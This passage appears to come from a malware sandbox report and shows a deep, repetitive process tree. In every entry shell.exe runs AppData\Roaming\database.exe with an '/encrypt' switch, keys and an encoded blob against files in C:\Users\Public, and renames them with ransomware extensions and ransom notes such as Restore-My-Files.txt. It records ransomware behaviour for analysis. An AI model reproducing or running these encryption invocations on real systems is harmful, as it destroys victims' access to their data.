                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Documents\!HELP_SOS.hta.gif.sage"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5160
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Documents\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Documents\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4320
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Downloads\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5160
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Downloads\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Music\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6512
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Music\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6264
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Music\Sample Music\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4320
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Music\Sample Music\[email protected] 1.2.0.0.id-PWMKXUEAKWFERZZJIPDAFYRRCQTEJNYWNZUY-11@7@2024 4@47@48 PM5858394.randomname-XVHTSZBDMOSTVKUWYZBGKMNPSTVXZB.OSE.cbf.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3604
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Music\Sample Music\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Music\Sample Music\Sleep Away.mp3.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5160
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:224
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:916
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\Sample Pictures\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7192
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
